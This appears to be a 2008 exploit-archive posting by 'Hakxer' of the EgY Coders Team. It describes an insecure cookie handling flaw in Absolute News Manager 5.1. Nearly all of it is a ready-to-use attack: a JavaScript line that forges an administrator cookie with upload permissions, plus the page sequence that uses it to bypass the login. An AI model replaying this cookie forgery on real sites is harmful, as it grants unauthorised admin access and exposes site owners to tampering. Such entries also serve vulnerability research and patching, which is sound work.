[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Absolute News Manager 5.1 Insecure Cookie Handling Vulnerability
# Published : 2008-10-31
# Author : Hakxer
# Previous Title : U-Mail Webmail 4.91 (edit.php) Arbitrary File Write Vulnerability
# Next Title : Absolute News Feed 1.0 Remote Insecure Cookie Handling Vulnerability
#################################################################################
## Discovered by : Hakxer #
## Script : Absolute News Manager :http://www.xigla.com/absolutenmnet/demo.htm #
## Greetz : Allah , Egyptian x Hacker , SQL_Inj4ct0r , Stealth , All my team #
## Team : EgY Coders Team #
## ----------------------------Start Exploit----------------------------------- #
## First Go to http://www.xigla.com/absolutenmnet/demo/login.aspx
## Execute JS Code : javascript:document.cookie="xlaANMadmin_demo=usr=1&lvl=2&uniqueid=&permissions=upload,relate";
## Second Go to http://www.xigla.com/absolutenmnet/demo/menu.aspx
## _=END=_
#############################################################################
# www.Syue.com [2008-10-31]